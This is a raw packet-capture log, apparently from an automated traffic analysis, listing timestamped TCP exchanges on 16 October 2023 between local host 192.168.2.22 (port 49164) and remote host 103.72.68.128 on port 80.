                                                Oct 16, 2023 09:58:27.721570969 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721612930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721626997 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721684933 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721705914 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721745014 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721776009 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721818924 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721822023 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721858978 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722008944 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722052097 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722138882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722182035 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722224951 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722264051 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722274065 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722312927 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722316027 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722352028 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722368956 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722408056 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722469091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722486019 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722510099 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722526073 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722567081 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722582102 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722606897 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722624063 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722676039 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722714901 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722732067 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722774982 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722795010 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722831964 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722868919 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722908020 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722930908 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.722971916 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.722985983 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723035097 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723042011 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723079920 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723113060 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723150969 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723164082 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723205090 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723211050 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723246098 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723277092 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723315954 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723335981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723371983 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723380089 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723421097 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723484039 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723525047 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723556042 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723596096 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723620892 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723635912 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723673105 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723709106 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723740101 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723781109 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723810911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723853111 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723874092 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723912954 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.723939896 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723985910 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.723997116 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.724011898 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.725591898 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.725626945 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.725641012 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.725657940 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.725707054 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.725764036 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.725785971 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.725825071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.725856066 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.725903988 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.725903988 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.725941896 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.725960970 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726022005 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726044893 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726070881 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726095915 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726155043 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726176023 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726239920 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726253033 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726315975 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726320982 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726361990 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726413965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726453066 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726484060 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726500034 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726521969 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726593971 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726597071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726634979 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726654053 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726684093 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726695061 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726722956 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726737976 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726779938 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726789951 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726843119 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726851940 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726891994 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.726922989 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.726965904 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727032900 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727071047 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727092981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727132082 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727154970 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727194071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727258921 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727296114 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727348089 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727364063 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727387905 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727405071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727427006 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727464914 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727514029 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727552891 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727602959 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727639914 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727752924 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727804899 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727816105 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727855921 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727885962 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727924109 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.727947950 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.727961063 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728013039 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728050947 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728054047 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728094101 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728126049 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728173971 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728225946 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728266954 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728301048 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728368044 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728382111 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728404045 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728436947 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728477001 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728509903 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728537083 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728560925 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728578091 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728610992 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728651047 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728669882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728698969 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728725910 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728739023 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728769064 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728805065 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728811026 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728854895 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728873968 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728916883 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.728939056 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.728976011 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729058981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729100943 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729147911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729191065 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729221106 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729257107 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729315042 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729360104 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729401112 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729443073 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729506969 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729549885 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729584932 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729624033 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729685068 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729743004 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729774952 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729825020 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729825974 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729862928 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729878902 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.729928017 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.729984045 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730058908 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730082035 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730099916 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730151892 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730195045 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730212927 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730252028 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730329990 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730371952 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730424881 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730465889 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730523109 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730571032 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730603933 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730648994 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730700016 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730746031 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.730797052 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.730834007 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731034994 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731086016 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731092930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731127977 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731204987 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731255054 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731312990 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731357098 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731401920 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731442928 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731517076 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731561899 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731589079 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731647968 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731652975 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731684923 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731786966 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731834888 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731887102 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.731925964 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.731987000 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732033014 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732068062 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732109070 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732184887 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732229948 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732280970 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732321978 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732357979 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732397079 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732418060 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732456923 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732480049 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732526064 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732542992 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732570887 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732578039 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732606888 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732640028 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732719898 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732731104 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732767105 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732810020 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732861042 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.732911110 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.732950926 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733007908 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733047962 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733097076 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733119011 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733163118 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733232975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733269930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733279943 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733324051 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733355045 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733388901 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733401060 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733418941 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733474016 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733505964 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733539104 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733580112 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733581066 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733618021 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733637094 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733678102 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733696938 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733726025 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733748913 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733761072 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733798981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733833075 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733841896 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733881950 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.733925104 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.733966112 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734029055 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734072924 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734086990 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734126091 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734146118 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734185934 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734231949 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734275103 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734337091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734371901 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734416008 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734457016 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734488964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734535933 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734622955 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734622955 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734648943 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734688044 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734690905 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734724045 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734786034 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734812021 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734833002 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734852076 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734878063 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.734921932 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.734989882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735028028 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735109091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735124111 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735146999 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735163927 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735178947 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735212088 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735234022 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735270023 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735304117 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735341072 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735342026 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735378981 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735424995 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735465050 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735497952 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735542059 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735544920 CEST8049164103.72.68.128192.168.2.22
